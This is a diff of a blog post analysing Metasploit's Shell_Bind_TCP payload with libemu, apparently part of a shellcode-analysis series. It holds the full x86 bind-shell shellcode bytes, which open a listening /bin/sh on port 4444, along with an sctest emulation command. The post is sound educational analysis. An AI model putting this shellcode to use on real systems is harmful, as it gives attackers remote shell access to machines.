C-Brown/C-Brown.github.io/_posts/2019-03-03-MSF-Analysis-3.md

 2. [ndisasm - chmod](#chmod)

 ### Shell_Bind_TCP
 We have our shellcode printed out, now let's run it and check the output.  libemu is such a great tool and really makes the analysis much easier.
-We get to see the instructions stepped through with the status of the registers and then the syscalls are all listed out with their arguments at the end.\
+We get to see the instructions stepped through with the status of the registers.
+At the end of the output, the syscalls are all listed out with their arguments.

-WARNING: there will be a lot of output.. don't worry, it will all make sense once you understand the format.
+WARNING: there will be a lot of output.. hopefully it will all make sense once you understand the format.
 ```
 python -c "print '\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'" | sctest -vvv -Ss 100000
 verbose = 3